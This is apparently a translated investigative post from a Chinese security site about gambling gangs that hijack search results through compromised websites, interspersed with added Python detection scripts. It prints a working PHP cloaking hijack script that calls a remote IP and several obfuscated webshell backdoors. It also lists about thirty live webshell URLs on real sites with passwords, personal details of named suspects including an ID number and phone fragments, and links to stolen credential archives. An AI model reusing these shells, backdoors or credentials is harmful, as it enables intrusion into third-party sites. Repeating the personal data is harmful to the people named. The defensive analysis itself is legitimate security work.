Cause
It started when I compromised a large site during a penetration test; when I entered the webshell the next day I found a new backdoor in the current directory. After careful inspection I found that it was a gambling gang's doing: the site had been hijacked by a black-hat SEO hijack program, as follows:
set_time_limit(20);error_reporting(0);
define('u_b','/');
define('s_u','http:// 107.182.228.74/');
define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|[email protected]');
define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER['HTTP_USER_AGENT']);define('h_z',s_p());
function s_p(){$d='';if(isset($_SERVER['REQUEST_URI'])){$d=$_SERVER['REQUEST_URI'];}else{if(isset($_SERVER['argv'])){$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['argv'][0];}else{$d=$_SERVER['PHP_SELF'].'?'.$_SERVER['QUERY_STRING'];}}if(isset($_SERVER['SERVER_SOFTWARE']) && false!==stristr($_SERVER['SERVER_SOFTWARE'],'IIS')){if(function_exists('mb_convert_encoding')){$d=mb_convert_encoding($d,'UTF-8','GBK');}else{[email protected]('GBK','UTF-8',@iconv('UTF-8','GBK',$d))==$d?$d:@iconv('GBK','UTF-8',$d);}}$r=explode('#',$d,2);$d=$r[0];return $d;}function r_s($url){$o=array('http' => array('method'=>"GET",'timeout'=>8));$context=stream_context_create($o);$h=file_get_contents($url,false,$context);if(empty($h)){$h=file_get_contents($url);}return $h;}
if(preg_match(s_s,r_s)){$d_s=true;if(preg_match("@site%3A|inurl%[email protected]",r_s)){setcookie('xx',h_t,time()+259200);$d_s=false;}if($d_s ){setcookie('xx',h_t,time()+259200);$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&ad=1&xh='.bin2hex(h_t);$d_c=r_s($d_u);header("Location: ".$d_c.'?'.h_t);exit;}}if(strstr(h_z,u_b)){if(preg_match(s_s,u_s)){$d_u=s_u.'?xu='.bin2hex(h_z);$d_u.='&xh='.bin2hex(h_t);$d_c=r_s($d_u);echo $d_c;exit;}}
https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d
It seems to be aimed at 360. I was stunned by the results of searching for gambling-related keywords with the site: operator on 360! Actually a great many sites are hijacked, including my own penetration-test targets, and the results look as if the ranking were controlled by the search engine itself; in fact the criminals exploit the search engine's ranking rules. From the collection timestamps, this problem began to appear in 2014, that is, it has existed for years and is only now being exposed.
So I carried out a full investigation, because these activities do great harm to society; I am not the only victim, everyone in the security circle is.
Investigation
Finding the gang behind it
Investigating the big-shell problem
Analyzing the gangs' backdoor characteristics
1. I went through the shells in my hand. First I changed the backdoor address, and at the original address I put JS code that records fingerprint information and JSON requests to major websites. Then it was time to wait quietly.
2. I analyzed the big shell again, reading through all of its code without finding any problem. I also captured its traffic, and there were no outbound requests. Because I found nothing, I deliberately kept monitoring packets for a whole week, still without result. By now I was puzzled: if the shell is clean, how could anyone get all my backdoors? Was my computer hacked? My network environment allows no protocol other than HTTP, and my backdoors are stored on this Linux box, so that can be ruled out too. I had to think again.
3. I checked all the sites hijacked by the gang and found that the creation time of every file on each site had been updated to the intrusion time, which matches exactly the pattern of sites they had just broken into.
As shown in the figure, almost every site has all of its creation times updated after the intrusion.
After that I collected samples from their own backdoors and made new progress: a total of two waves from different gangs were found, but the big shells they used were all of the same type (see Annex 1).
After decrypting and auditing their shell, I found that the receiving address ("box") recorded by the backdoor in the shell was api.fwqadmin.com. Since this was a new lead I could only keep it for now and infiltrate it later.
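The mass-changed file times described in step 3 are something a defender can check for. As an added example (my own code, not from the original post), here is a Python script that walks a webroot and reports timestamps shared by an unusually large number of files. It works on modification time (mtime), since creation time is not available on most Linux filesystems, and builds a constructed sample webroot in a temporary directory for demonstration; the threshold of five files and the sample timestamps are assumptions.

```python
import os
import tempfile
from collections import defaultdict


def timestamp_clusters(entries, min_files=5):
    """entries: iterable of (path, mtime_seconds). Returns {mtime: [paths]} for
    every whole-second timestamp shared by at least min_files files."""
    groups = defaultdict(list)
    for path, mtime in entries:
        groups[int(mtime)].append(path)
    return {t: sorted(paths) for t, paths in groups.items() if len(paths) >= min_files}


def walk_mtimes(root):
    """Yield (path, mtime) for every regular file under root; unreadable entries are skipped."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                yield path, os.stat(path).st_mtime
            except OSError:
                continue


def scan_webroot(root, min_files=5):
    """Report mtime clusters in a webroot; a large cluster on one second is the
    mass-touch pattern described in the post, or an ordinary bulk deploy."""
    return timestamp_clusters(walk_mtimes(root), min_files)


def build_demo_webroot():
    """Constructed sample webroot: eight files with spread-out mtimes plus twelve
    files under data/cache all set to one 'intrusion' second. Returns (root, that second)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    intrusion = 1477440000  # 2016-10-26 00:00:00 UTC, a constructed value
    for i in range(8):
        path = os.path.join(root, f"page_{i}.php")
        open(path, "w").close()
        os.utime(path, (1400000000 + i * 86400, 1400000000 + i * 86400))
    cache = os.path.join(root, "data", "cache")
    os.makedirs(cache)
    for i in range(12):
        path = os.path.join(cache, f"f{i}.php")
        open(path, "w").close()
        os.utime(path, (intrusion, intrusion))
    return root, intrusion


if __name__ == "__main__":
    root, ts = build_demo_webroot()
    for t, paths in scan_webroot(root).items():
        print(f"{len(paths)} files share mtime {t}:")
        for p in paths:
            print("   ", p)
```

A legitimate deployment (git checkout, unzip) also produces timestamp clusters, so treat a hit as a lead to correlate with access logs rather than as proof. Note that utime cannot set ctime, so on Linux the ctime of a mass-touched file still tells you when the touch itself happened.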
Progress
After two days of waiting I finally got the gang's fingerprint information and QQ number, then went into full social-engineering mode and basically confirmed the real identity of the man (known in the circle as Lao Yuan). Then I registered a QQ alt account and anonymously added some QQ contacts from gambling navigation sites. I asked several people on QQ without result. Later I simply talked with them in depth in the guise of a gambler. Through these conversations I learned that the gang's shells were all purchased, and that they earn several million yuan a month (whether that is true is unknown). At this point I could basically confirm that my earlier judgment was wrong; Lao Yuan was the only lead.
I collected all the sites hijacked by the gang and the navigation domains they redirect to. First I infiltrated the sites that were not my own and collected samples from their backdoors, and found a big shell similar to mine but with a different core variable structure, so I downloaded it for auditing and packet capture. Later, comparing features, I found that the POST parameters the big shell sends were the same, e.g. gopwd=password&godir=. At this point I preliminarily concluded that the problem lies in the upstream network: extracting big-shell addresses from traffic by their signature is terrifying.
I got in touch with Lao Yuan and cross-examined him a bit. I felt he was very scared. He said not to go after him; he used to do scams. Later he sent me some shell addresses to placate me, listed below. These are the Star gang's:
http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://www.212200.com/mocuz/downapp/images/pclife.php?1=2&Z=Opm Hys7sa5wrKKO00GSBtashras28asNNmsn18
http://www.dailiba.com/about/index.php?v=1 Tmbdcuu123uualltop
http://www.chinaunix.net/mysql/tmp/hoem.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ytsadAskLs27ssJsjdasd2sS
http://www.baby-edu.com/member/admin/include/fields/box/index.php?v=qw ytsadAskLs27ssJsjdasd2sS
http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct
http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko
http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct
http://www.copperhome.net/file/avatar/31/cb/index.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://www.dailiba.com/about/index.php?v=1 Tmbdcuu123uualltop
http://www.hubeifc.com/phpcms/modules/content/classes/commentl_api.class.php UTF8
http://domarketing.org/phpsso_server/caches/commons/index.php?v=2ss ytsadAskLs27ssJsjdasd2sS
http://www.huse.edu.cn/phpsso_server/phpcms/languages/en-us/condif.inc.php?v=sd ytsadAskLs27ssJsjdasd2sS
http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko
http://www.hbmykjxy.cn/2015/0106/4589.php?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct
http://www.hongze365.com/data/avatar/1/f/1.gif?1=2&GSW=Curry TTrsfsdh748jsusyKKOystw889sbct
http://bbs.fish3000.com/mobcent/app/config/discuz.bak.php?1=2&TD=SAS UUys78tasdRhasd00iasdyTGGgahs
http://bbs.dqdaily.com/uc_server/install/images/close.php?1=2&sha=shan 7yJJN730%1&uqYYqwhkkasII17vcxQ1mzaPQhn8!P
http://www.aquasmart.cn/member/fckeditor/editor/css/friend.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://www.yangji.com/member/editor/fckeditor/editor/dtd/fck_dtd_test.gif?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qko
http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php 7yhaw1woAksmjh892jsasd1sajg
http://www.shenma66.com/nvzhubo/baorurekuxiongmiaonvzhuboMinanaxingganrewuzhiboshipin/inde.php 7yhaw1woAksmjh892jsasd1sajg
http://bbs.taisha.org/pms/data/templates/wind_homes.tpl.php?baidu=Google erk12hj3nfher71h3j4k132bnnebr3hg4134
http://www.168w.cc/api/map/baidu/baidu.php?1=1&f=k HyhbokskjGrsjhjM8hsL_hgshgK
http://www.dibaichina.com/goldcard/data/alliance/images/GHMC.php?1=1&baidu=.com Tmbdcuu123uualltop
http://www.ijcz.cn/module/brandjoin/join.claos.php?1=2&BK=ManUtd YIasdwj78954qwtyVVJsarwhahuyrwvsllps2
http://www.xiashanet.com/Head_Foot/bak/top900x40.php?1=2&BAT=HEHEDE 77iasyw00aUUSImmsb64682301jMM!!!Qkos
http://www.hotpoll.com.cn/i/index.php?v=111 heiheideheihei
Who the hell is the Star gang? Another gambling operation? After further talks with Lao Yuan, it turned out these shells all belong to another gambling player; he said they are the biggest group in the gambling circle. Honestly, I was excited; this was getting more and more interesting and I wanted to see who these people were.
But my target was still Lao Yuan, because I had to find the person who sells him his shells. After some back and forth I got the truth, and also asked him to provide evidence of the transactions; I'll leave that out here and put it in the forensics section later.
Although I had the shell seller's contact information, he had not accepted me yet. So I tried another approach, the old phishing trick: I put JS and JSON on the big shell's address, with a few words pasted in, "add me, email: [email protected], I will give you all webshells", and had Lao Yuan send it to him so that he would contact me on his own initiative.
Later he did visit several webshell addresses, and I also grabbed his real PC fingerprint, proxy fingerprint and QQ nickname. After that he came to me on his own, asked whether I was from the Star gang, and said he had received my email. Now I was curious: had the Star gang been looking for him? Then he tried to intimidate me, saying he wanted to catch "you" (the Star gang) and had been investigating the Star gang for a year.
I thought: the water is really deep here, who is investigating whom? But he couldn't hide from me; after all I had evidence that he sells shells. Unexpectedly he said, "The people behind me are at the provincial level. Where do you think these shells come from? They are all extracted from state machines." Can the state do such a thing? I believe the state records website visits and ISPs keep logs for a year, but batch extraction of website access signatures nationwide I don't believe, unless a hacker compromised an operator to extract them.
After some talk he said that I had been a Star gang member all along, which was smearing me. Later I added him on my own initiative and said, "You're from Hebei. I have evidence of your crime." He got scared, offered to make amends, and sent me a packed archive of webshells. I was shocked again; this was beyond belief. There were tens of thousands of webshells and backend login passwords for every CMS in China, including dedecms, discuz, WordPress, emlog, ECSHOP, empty, Jieqi, phpMyAdmin, UCHOME, UCenter, PHP168, almost every CMS in the country, with tens of thousands of entries of each kind. I will upload part of them in the attachment. He said the person behind him has hundreds of thousands of discuz backend login accounts and passwords. I tested some of the backend passwords he sent me and all of them could log in, including the login hash, uid, username, password, security question and security answer, all from the day before.
What can record so many things without any abnormality? I saw that there were many sites where I had used the big shell, and tens of thousands of webshells among them including many of my own sites, plus a large number of different kinds of big shells with different passwords. It seems I am not the only victim. Matching the signatures, there may be hundreds of different big-shell signatures. And what he sent me was only a small part; he asked me for money to get more. That way, he has hundreds of thousands of resources. He said the people behind him are a technical team with all kinds of 0days, working for the state, and that he holds the nation's webshells. If that were true, why would the resources turn up here for sale? It's obviously a lie to scare me off from investigating him. I didn't believe it and decided to continue the investigation.
After several days of analysis, this batch of data is the same as the Jiugongge (nine-grid) incident exposed by WooYun (you can look back at http://www.dedebox.com/core/centerxxxxx.php from 2013). I also packed up and analyzed the data from that time and found some duplicate data among the shells. At present the login parameters of the big shell and of Jiugongge are basically modifications of the Spider PHP Shell (SPS) code. That is to say, besides its own backdoor, this group also obtains large numbers of webshells through other channels, then runs through the webshells code that records backend data and writes it into memory as resident code, staying alive for years as long as the server is not replaced. This is also a guess, because some sites in the backend data are indeed Jiugongge repeats; if it were the Jiugongge backdoor I would have a new direction to check. The above is my general analysis and investigation process. Next I will not describe the process but directly provide the data records and forensics results for the police to finish the job.
Obtaining evidence
Here are the domain names that gang one (Lao Yuan) redirects to:
116305.net
559160.net
618309.net
786077.net
551809.com
www.919808.net
www.226830.com
They all come from the same gang, but the domain names differ; each site redirects to a different domain to spread the risk. The IP in the hijack code is the same, 107.182.228.74, which is quite sophisticated.
These are the IP addresses that simulate spiders to fetch the gambling (BC) logo image addresses of the hijacked content:
210.126.27.70
pic.root1111.com
58.96.179.132
104.202.66.226
The gang's working-environment IPs are in Malaysia (October 9 to October 26):
2016-10-26 13:00:01 (IP 14.192.210.34) Malaysia Windows NT 10.0, MSIE 49.0, Firefox 49.0, 1536×864
2016-10-26 13:20:09 (IP 103.6.245.143) Malaysia Windows NT 10.0, MSIE 49.0, Firefox 49.0, 1536×864
2016-10-26 13:00:25 (IP 175.141.34.101) Malaysia Windows NT 6.3, Chrome 50.0.2661, QQBrowser 9.5.9244, 1920×1080
2016-10-24 13:59:17 (IP 175.136.41.251) Malaysia Windows 7 & 2008 R2, MSIE 49.0, Firefox 49.0, 1536×864
2016-10-25 14:28:11 (IP 175.143.101.241) Malaysia Windows NT 10.0, Chrome 47.0.2526, 1920×1080
2016-10-26 13:20:09 (IP 103.6.245.143) Malaysia Windows NT 10.0, MSIE 49.0, Firefox 49.0, 1536×864
14.192.211.116 Malaysia
14.192.211.223 Malaysia
175.138.234.137 Malaysia
Working PC fingerprints (analysis of 5 gang members):
Windows NT 6.3, MSIE 11.0, QQBrowser 9.5.9244, 1920×1080, 224 colors
Windows 7 & 2008 R2, MSIE 49.0, Firefox 49.0, 1536×864
Windows NT 10.0, Chrome 47.0.2526, 1920×1080
Windows XP, MSIE 6.0, 1126×800
Windows Server 2003, Chrome 49.0.2623, 1920×1080
Windows NT 10.0, MSIE 49.0, Firefox 49.0, 1536×864
Leader of this gang:
QQ: 4743048XX 6410755XX
Real name: Yuan X, from Chongqing
Mobile number: 159989847XX; phone MAC: 18:9E:FC:11:2C:70; Malaysian mobile number: 0601369589XX
His websites:
www.7cq.tv (a local forum he set up)
api.fwqadmin.com (the receiving address of the backdoor he left in the big shell he is using himself; the attachment includes a big-shell sample for those interested)
www.badongedu.com
Email: [email protected] [email protected]
Historical IPs in China:
222.178.225.146 (Chongqing, Telecom)
222.178.201.12 (Chongqing, Telecom)
27.11.4.19 (Chongqing, Unicom)
27.10.36.56 (Chongqing, Unicom)
113.204.194.202 (Chongqing, Unicom)
119.84.66.14 (Chongqing, Telecom)
61.161.125.77 (Banan District, Chongqing: 时代e行线 internet cafe club, Lijiatuo store, Hall A/B)
Historical PC information in China:
MAC: 90-2b-34-93-ad-73
Operating system: Microsoft Windows XP
Graphics card: NVIDIA GeForce GT 610
CPU: AMD Athlon(tm) II X4 640 Processor 3325HZ
I did not investigate the other gang members' information; finding him is enough.
WebShell seller (一切安好) information
VPN proxy:
110.10.176.127 Korea
2016-10-24 22:26:37 (IP 211.110.17.189) Korea
(the host was purchased with bitcoin) access time: October 9
Real IP:
2016-10-26 16:23:27 (IP 121.18.238.18) Baoding, Hebei; Shanghai Wangsu Technology Co., Ltd. Unicom CDN node; Windows NT 10.0, Chrome 47.0.2526, 1920×1080
27.186.126.196 Baoding, Hebei, Telecom; more likely the real IP
There are three different browser fingerprints, but they should all be the same person; maybe he has more computers, because he has two QQs.
Windows NT 6.3, Chrome 45.0.2454, 1366×768 (real fingerprint)
Windows NT 10.0, Chrome 47.0.2526, 1920×1080
Windows NT 6.3, Chrome 45.0.2454, 1366×768, 224 colors, Alexa toolbar not installed
Windows NT 10.0, Chrome 53.0.2785, 1600×900, 224 colors
QQ: 2436449670 3496357182
Telegram: @haorenge888
This man now drives an Audi A8, a "local tyrant". He seems to have made a lot of money and is still at large. He has a Hebei accent, i.e. he is from Hebei.
To find out the source of the webshells, one can only trace his behind-the-scenes channel.
His transaction records with Lao Yuan:
Star gang information
Domains used:
wokeda.cn
chuan2828.com
cnzzz.pw
web-159.com
diyi1111.com
diyi2222.com
diyi3333.com
diyi4444.com
xinyu55.com
hongyihai.com
80268.com
5130898.com
maimai789.com
zhenyi58.com
xwgy999.com
wokeda.cn
www.98589.com
www.356388.com
chuan28.com
cnzzz.pw
web-159.com
diyi1111.com
diyi2222.com
diyi33.com
diyi44.com
xinyu55.com
hongyihai.com
80268.com
5130898.com
maimai789.com
zhenyi58.com
xwgy999.com
Statistics code:
document.writeln("<div style=\"display:none;\"><script language=\"javascript\" type=\"text\/javascript\" src=\"http:\/\/js.users.51.la\/18737987.js\"><\/script><\/div>");
var hmt = hmt || [];
(function() {
var hm = document.createElement("script");
hm.src = "//hm.baidu.com/hm.js?c1c374db31da00a022c09301920eff78";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(hm, s)
})();
callJump()
}
}
} if (init_flag == "93989") {
call_init_error()
}
Through analysis of the statistics (tracking) code on their website, the login records show that the Malaysian IP is the real IP.
They have hijacked more than 1000 websites, including many of the largest news sites in China such as ifeng.com and china.com.cn; if the police need it, I can provide a list.
The Star hijacking group is based in Malaysia with about six members. Their penetration methods include but are not limited to spear phishing, social engineering, brute-forcing, 0day/nday and other vulnerabilities; crawlers are used to intrude in batches. After each intrusion they like to leave large numbers of backdoors so as not to lose access.
Division of labor:
Two core technical intruders (one mainly responsible for attacking and compromising large news sites; one mainly responsible for code auditing and a series of internal PHP development, including the hijack programs, plus intrusion of some medium-weight sites)
One ordinary technical intruder (compromising junk sites turned up by vulnerability scanning)
Two people responsible for planting the hijack code; if it gets removed, they restore it
One person in charge of marketing and finance, collecting accounts on gambling (BC) sites
Core members returned from Malaysia to China in December 2015 and went back to Malaysia around February 2016.
The above is what I learned through certain measures taken by people in the circle. Because the gang is very security-conscious, not much real information was obtained, but a hacker who has done outsourced work for them can be followed up.
QQ used by the Star gang: 31xxxxxx (the earliest)
Well-known "beauty hacker": yingcracker
QQ:2537789XX 9847545XX
Mobile: 13665xxxxxx or 13665xxxxxx
Name: Jiang XX
Find this female hacker to learn about the gang's situation and there should be progress.
Their backdoor samples:
<?php
@$A='Acc';$p='_';$o='PO';$s='S';$t='T';$a='as';$b='sert';$Acc=$a.$b;@${$A}(${$p.$o.$s.$t}[ziiuioxs]);
echo 'error';exit;?>
<?php
@$ksvSGu= "\x73tr\x5f\x72e\x70l\x61\x63e";
@$xRec= @$ksvSGu('wcaSq','','awcaSqrrwcaSqawcaSqywcaSq_filwcaSqter');
@$SOet= @$ksvSGu('wZTB','','aswZTBsewZTBrwZTBt');
@$xRec((array)@$_REQUEST['rretgscr'],@$SOet);
?>
<?php
if($_GET['jumpvv']){
$tu="TVFsnZG9vcnB5J";
$mzd="10pOwoK";
$fc="Cg";
$tnz = str_replace("rn","","rnstrnrrn_rrnernprnlrnarncrne");
$nu="pqldmqFsKCRfUE9";
$qwb = $tnz("u", "", "ubuausue6u4u_udueucoudue");
$lcq = $tnz("j","","jcrjejatej_jfujnjcjtjiojn");
$htx = $lcq('', $qwb($tnz("q", "", $fc.$nu.$tu.$mzd))); $htx();}
?>
<?php
@$EuTsNl="p"."r"."eg_r"."epla"."c"."e";
@$EuTsNl("/[email]/e",$_POST['iiaqffg'],"error");
?>
<?php
$ad = '|';$ad .='.';$ad .='*|';$ad .='e';
@preg_filter('|.*|e', $_REQUEST['andyzhengs'], '');
?>
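As an added example (my own code, not from the post, and not the gang's tooling), here is a Python indicator scanner that looks for the tricks visible in the samples above and in the hijack script at the top of the post: a regex literal with the /e modifier, function names assembled by string concatenation, str_replace junk stripping or hex escapes, calls made through variables on request data, and referer/user-agent cloaking combined with a fetch from a remote IP-literal URL. The weights and the threshold are my own assumptions; the PHP snippets in SAMPLES are constructed variants modeled on the page's samples rather than copies of them, and 203.0.113.5 is a documentation placeholder address.

```python
import os
import re
import tempfile

# Indicator table: (name, [regexes that must ALL match], weight). The patterns
# mirror tricks seen in the backdoor samples and hijack script on this page;
# the weights and THRESHOLD are my own assumptions, not a published scheme.
INDICATORS = [
    # a quoted regex literal whose flags include e, e.g. "/[email]/e" or '|.*|e'
    ("regex_e_modifier",
     [r"""(['"])([/|#~%])[^'"]*[.*\[(\\+?][^'"]*\2[imsxuADSUXJ]*e[imsxuADSUXJ]*\1"""], 5),
    # ${$A}(...): the function name comes from a variable-variable
    ("varvar_function_call", [r"\$\{\$\w+\}\s*\("], 5),
    # $f((array)@$_REQUEST[...]): call through a variable on raw request data
    ("variable_call_on_request",
     [r"\$\w+\s*\(\s*(?:\(array\))?\s*@?\$_(?:POST|GET|REQUEST|COOKIE)\s*\["], 5),
    # str_replace("rn","","rnstrnrrn_..."): a junk token stripped from a literal
    ("junk_stripping_str_replace",
     [r"""(?:str_replace|\$\w+)\s*\(\s*(['"])\w{2,}\1\s*,\s*(['"])\2\s*,\s*['"]"""], 4),
    # "\x73tr\x5f...": three or more hex escapes inside one string
    ("hex_escaped_string", [r"""\\x[0-9a-fA-F]{2}(?:[^'"\\]*\\x[0-9a-fA-F]{2}){2,}"""], 3),
    # "p"."r"."eg_r"...: a built-in name assembled from short literals
    ("builtin_name_concat",
     [r"""(['"])\w{1,6}\1\s*\.\s*(['"])\w{1,6}\2\s*\.\s*['"]"""], 3),
    # $h();: a variable holding a generated function is invoked bare
    ("variable_called_without_args", [r"\$\w+\s*\(\s*\)\s*;"], 2),
    ("eval_family", [r"\b(?:assert|eval|create_function|preg_replace|preg_filter)\s*\("], 2),
    ("superglobal_input", [r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\["], 1),
    # referer/UA matched against search-engine names plus a Location redirect
    ("search_engine_cloaking",
     [r"HTTP_(?:REFERER|USER_AGENT)",
      r"(?:360spider|sogou|haosou|sm\.cn|baiduspider)",
      r"""header\s*\(\s*['"]Location"""], 6),
    # payload pulled from an IP-literal URL at request time
    ("remote_payload_fetch",
     [r"file_get_contents\s*\(", r"https?://\s*\d{1,3}(?:\.\d{1,3}){3}"], 3),
]
THRESHOLD = 5  # assumption: one strong indicator is enough to triage a file


def scan_php(src):
    """Return (score, [indicator names]) for one PHP source string."""
    score, hits = 0, []
    for name, patterns, weight in INDICATORS:
        if all(re.search(p, src) for p in patterns):
            hits.append(name)
            score += weight
    return score, hits


def is_suspicious(src, threshold=THRESHOLD):
    return scan_php(src)[0] >= threshold


def scan_tree(root, threshold=THRESHOLD):
    """Walk a webroot and return {path: (score, hits)} for files at or above threshold.
    Every regular file is scanned regardless of extension, because the shell list
    in this post includes .gif and .bak.php paths."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    score, hits = scan_php(fh.read())
            except OSError:
                continue
            if score >= threshold:
                flagged[path] = (score, hits)
    return flagged


# Constructed inputs modeled on the samples above (not copied from them).
SAMPLES = {
    "varvar_assert": r"""<?php @$A='Acc';$p='_';$o='PO';$s='S';$t='T';$a='as';$b='sert';$Acc=$a.$b;@${$A}(${$p.$o.$s.$t}['k']);""",
    "hex_str_replace": r"""<?php @$f="\x73tr\x5f\x72e\x70l\x61\x63e";@$g=@$f('zz','','azzrrzzay_zzfilter');@$g((array)@$_REQUEST['k'],'assert');""",
    "junk_create_function": r"""<?php if($_GET['j']){$t=str_replace("rn","","rnstrnrrn_rrnernprnlrnarncrne");$c=$t("j","","jcrjejatej_jfujnjcjtjiojn");$h=$c('', 'return 1;');$h();}""",
    "concat_preg_e": r"""<?php @$E="p"."r"."eg_r"."epla"."c"."e";@$E("/[email]/e",$_POST['i'],"error");""",
    "preg_filter_e": r"""<?php @preg_filter('|.*|e', $_REQUEST['a'], '');""",
    "cloaking": r"""<?php
define('s_s','@haosou.com|360.cn|spider|360spider|sogou|sm.cn@i');
define('r_s',$_SERVER['HTTP_REFERER']);
if(preg_match(s_s,r_s)){$c=file_get_contents('http://203.0.113.5/?xu='.bin2hex($_SERVER['REQUEST_URI']));header("Location: ".$c);exit;}""",
    "benign": r"""<?php
$name = htmlspecialchars($_GET['name'] ?? 'world', ENT_QUOTES);
$slug = str_replace(' ', '-', strtolower($name));
header("Location: /hello/" . $slug);""",
}


def demo_scan_tree():
    """Write SAMPLES into a temporary directory and scan it with scan_tree."""
    root = tempfile.mkdtemp(prefix="phpscan_")
    for label, src in SAMPLES.items():
        with open(os.path.join(root, label + ".php"), "w", encoding="utf-8") as fh:
            fh.write(src)
    return scan_tree(root)


if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(f"{label:22s} {scan_php(src)}")
```

Expect false positives from legitimate callback code (`$callback($_POST[...])`) and from the occasional string literal that happens to look like a delimited regex; the score is a triage aid for deciding which files to read, not a verdict.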
Some of them I copied directly into the folder.
Suspect information
The characteristics of this incident resemble those of Jiugongge, so I went back over the 2013 incident and investigated this person in depth. It can be narrowed down to two people; one of them must have done it.
If it is not a problem with the big shell, then the backdoor incident can also be learned about from these two people. The only uncertainty is that no problem can be seen in the box's big shell. It is so similar to the data of their earlier backdoor, which covers almost every CMS; some of the backend records are also in the Jiugongge boxes that were broken into a few years ago, and new content is still being recorded up to now.
Suspect 1:
Former t00ls (土司) member spider, author of the Spider big shell, which he also backdoored at the time, dating back to 2011. Investigation showed that the shells and big shells he publicly released back then contained a backdoor, and he also used a large number of sites for hijacking, logging and planting trojans. It is said he made millions in 2012, then kept a low profile and disappeared from the circle. But the investigation has new findings: he has been active. This year he logged in to his old mailbox and renewed the backdoor's domain name, because the domain name cannot be changed, otherwise he would no longer receive the shells.
Id: iamspider iamsunchao
Real name: Sun x
Age: 29 (uncertain)
Studied in: Fuxi junior high school, Rongxian, Zigong
Household registration: Xichang, Chengdu
QQ: 80937xx (real QQ) 8622629xx (small)
Historical IP (may be out of date)
222.215.38.109 (Neijiang Telecom, Sichuan Province)
61.157.123.56 (Xichang Telecom, Liangshan Prefecture, Sichuan Province)
222.215.39.131 (Neijiang City (Longchang County) Telecom, Sichuan Province)
222.209.198.201 (blue sky cloud Internet bar near Sichuan Conservatory of music, Xindu District, Chengdu, Sichuan Province)
Suspect 2:
A "great god" in the circle: toby57. Those who have dealt with him before say he works for the state, which doesn't quite fit the mastermind of this affair, but he is the owner of the dedebox.com domain name and has more than enough ability to do such things.
Email: [email protected], also his most commonly used IM
Historical IPs:
171.212.206.46 (Chengdu Telecom, Sichuan Province)
220.166.52.45 (Mianyang Telecom, Sichuan Province)
222.209.139.66 (Chengdu Telecom, Sichuan Province)
220.166.52.45 (Mianyang Telecom, Sichuan Province)
125.66.99.211 (Nanchong Telecom, Sichuan Province)
61.157.97.82 (Southwest University of science and technology, Mianyang City, Sichuan Province)
112.192.70.251 (Sichuan Nanchong Unicom)
125.65.97.134 (Mianyang Telecom, Sichuan Province)
61.157.97.85 (Southwest University of science and technology, Mianyang City, Sichuan Province)
182.139.60.17 (Chengdu Telecom, Sichuan Province)
Mobile number: 152083414xx
Name: Yang XX
ID card No.: 5116211989050625xx (Yuechi County, Sichuan Province)
City: Leshan
Studied in: Southwest University of science and technology, Mianyang City, Sichuan Province
Conclusion
At present there is no conclusion. Where all the big shells and the backend backdoors of every kind of CMS in China leaked from is still a mystery, because the capability is too strong... But I believe the police can solve the mystery; you have sufficient authority and mandate to carry out the crackdown. Otherwise the harm to Internet users is too great. Those webshells are used for gambling and fraud, which is a huge harm; nearly the entire gambling industry's and fraud industry's black-hat SEO sources come from here. If the harm is not stopped in time, it will expand without limit.
In addition, if you want to see the compromised sites, go to 360 search and search for 娱乐场 (casino) for the latest day:
https://www.so.com/s?q=%E5%A8%B1%E4%B9%90%E5%9C%BA&src=srp&fr=360sou_newhome&adv_t=d
Friendly tip: after using any big shell, check your shell to see whether the file times have all been set to the latest creation time.
PS: the attachment is a partial list of webshells, a few thousand random ones.
Portal: https://1drv.ms/u/s!Ahmf1buik7uanjrbtwlwoyebhu
Partial list of victim domain names (base count over 10,000 after deduplication, about 200,000 before; the information is similar to the attachment: each site records all administrator login accounts and passwords, including whether a webshell exists)
Portal: https://1drv.ms/t/s!Ahmf1buik7ua72fwzxzuvmx3fw
Once you have the victim list you can search it for the domains of the webshells in your hand; if present, deal with it promptly to avoid being harmed by the lawbreakers.
*Original author: for the author's safety, this has been anonymized. For reprints please indicate the source as FreeBuf (freebuf.com).